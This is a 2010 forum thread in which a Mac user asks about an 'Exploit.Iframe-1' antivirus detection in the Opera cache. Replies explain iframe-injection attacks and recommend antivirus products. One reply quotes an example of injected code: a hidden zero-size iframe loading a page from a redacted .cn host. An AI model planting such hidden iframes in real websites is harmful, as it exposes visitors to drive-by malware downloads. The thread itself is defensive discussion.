Would like second opinion on Exploit.Iframe-1

Discussion in 'malware problems & news' started by Carbonyl, Feb 10, 2010.

Thread Status:
Not open for further replies.
  1. Carbonyl

    Carbonyl Registered Member

    Joined:
    May 19, 2009
    Posts:
    256
    Hi everyone,

    I have a quick question regarding something that came up with my OS X (10.6.2) machine this morning. I should say that I run ClamXAV on my OS X box, mainly because I find most other security solutions for OS X rather expensive.

    I was browsing some familiar and trusted websites (in Opera 10.1, javascript whitelisted only for trusted sites, via site preferences) when ClamXAV came back with a quarantine warning for: Exploit.Iframe-1

    The files it found and quarantined (opr0TRGU, opr0TRLF, opr0TRMB, opr0TRMH) were found in the /Library/Caches/Opera/cache/ directory. I deleted them all, though before that I submitted to VirusTotal. Only ClamAV had a hit on them.

    I asked around on a few other forums - The answer I received was that "Exploit.iFrame is a trojan that can be attached to web pages or to an email... This is a Windows virus and cannot infect your Mac". I accepted that answer at first, but the more I think on it, the more I realize that iFrame attacks should be platform independent.

    A full scan with ClamXAV turned up clean. Are there any other steps I ought to take to ensure this problem is taken care of? Is there any lingering risk after purging the quarantined files? Any advice would be appreciated. I have an OK handle on my Windows machine, but OS X security is still new to me.

    Thanks!
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Exploit.Iframe is a generic description for exploits that inject i-frames into web sites, SQL injection being a common method. Typical code:

    Code:
    IFRAME SRC="HTTP://www.{REMOVED}.cn/1.htm" WIDTH=0 HEIGHT=0>/IFRAME>
    Here is McAfee's definition and analysis of an old one:

    http://vil.nai.com/vil/content/v_101203.htm

    The cached pages have exploit code targeting various Windows, Internet Explorer, and other application vulnerabilities, as shown above. If there are no exploitable vulnerabilities, the pages just sit in the cache and do nothing.

    Opera's cache files no longer include file extensions, but the ones you found are probably .htm and .js with different malicious codes inside. The usual payload is a trojan executable that is downloaded to the victim's machine, as shown in the McAfee example.

    In your case, these page were quarantined, which, I assume, means they could not execute any code, even if a MAC OS or application vulnerability were present. If the deleted pages are still in your Trash, you can retrieve them, Zip them, and send them to McAfee or other vendor for analysis. I would be surprised if they were other than Windows exploits.

    Does your CLAM AV have a forum?

    ----
    rich


    REFERENCES

    Another exploit:

    Exploit-Iframe.gen.s
    http://vil.nai.com/vil/content/v_212507.htm

    Web Hosts with infected sites:

    Exploit iframe malicious code
    http://tipsbucket.blogspot.com/2009/05/exploit-iframe-malicious-code.html
     
  3. Carbonyl

    Carbonyl Registered Member

    Joined:
    May 19, 2009
    Posts:
    256
    Thanks very much for the information Rmus! Once again you prove an exceptional source of knowledge on these forums.

    Unfortunately I purged all of these cache files before I could send them for analysis. They rather gave me a scare - I decided to look inside of them for the offending iFrame links to block the domains at the HOSTS level, but found yet ANOTHER stupid OS X security practice: Apparently TextEdit opens and parses HTML (and maybe javascript? Not sure) by default, so I unwittingly opened and executed whatever code was in those cache files. Shoulda used Pico!

    Anyhow, ClamXAV does have a forum, but my questions there have gone unanswered, and don't look to be on anyone's priority list.

    The bottom line seems to be that the malicious iFrame links will download and execute code that probably doesn't target OS X, but I suppose there's not way to be sure of that. Still, it seems pretty likely that the vulnerabilities targeted are Windows based ones, though probably updated from 2008. ClamXAV hasn't found anything since, though I may to find an alternative scanner to back this up, as I'm unsure of how to proceed.
     
  4. SweX

    SweX Registered Member

    Joined:
    Apr 21, 2007
    Posts:
    6,429
    Hi Carbonyl!

    If you want you can try out ESET's Antivirus BETA for OS X here.
    http://beta.eset.com/macosx

    And it protects you from Mac, Windows, and Linux Malware.
    And it is free of use as long as the Beta program is going on.

    ClamXAV only protects your Mac from Mac malware.

    Even if the Windows and Linux Malware cannot harm your Mac, I am sure you would not want them to come into your Mac anyway.

    Edit: BTW I don't think ESET's NOD32 OS X version will be to expensive when it leaves Beta status :)
     
    Last edited: Feb 11, 2010
  5. Blueshoes

    Blueshoes Registered Member

    Joined:
    Feb 13, 2010
    Posts:
    220
    Carbonyl,

    Intego is the Gold Standard for Mac anti-malware programs. ClamX has only 5 of the 13 trojan's in it's data base. The data base includes PC definitions. PCTools iAntivirus is basically dead. Symantec bought it and a couple weeks after and updates became almost non existence. Avast is too lazy to look for any Trojans and asks people in forums to send the most common trojans for OS X.

    Intego just came out with Virusbarrier X6 with an advanced firewall and lowered their prices and added a 2 mac per personal and 5 per family pack!!!!!!!!!!! No one beats Intego.
     
  6. Carbonyl

    Carbonyl Registered Member

    Joined:
    May 19, 2009
    Posts:
    256
    Thanks for the tip there, Swex! I didn't know ESET were getting into the OS X game at all. I quite like ESET's NOD for my Windows machines, so I decided to give this a try for my OS X machine.

    Wow - All I can say is, there's a reason this is still in beta! Phew! I think I'll steer clear until they figure out how to reduce overhead and conflicts.

    Blueshoes, thanks for the tip. I'm sure Intego is quite effective, but they're also a touch too expensive for me at the moment!

    I do appreciate the advice from both of you, but I was really asking more about the specific threat I encountered than asking what security solution I should be relying on.
     
  7. SweX

    SweX Registered Member

    Joined:
    Apr 21, 2007
    Posts:
    6,429
    @Carbonyl
    Wow - All I can say is, there's a reason this is still in beta! Phew! I think I'll steer clear until they figure out how to reduce overhead and conflicts.


    Hmmm... that's sad to hear. I don't own a Mac my self yet so I haven't been able to try the Beta out. :)

    But please be sure to report any conflicts/problems you have seen so Eset so they can fix them before I try it out myslef ;)
     
Loading...
Thread Status:
Not open for further replies.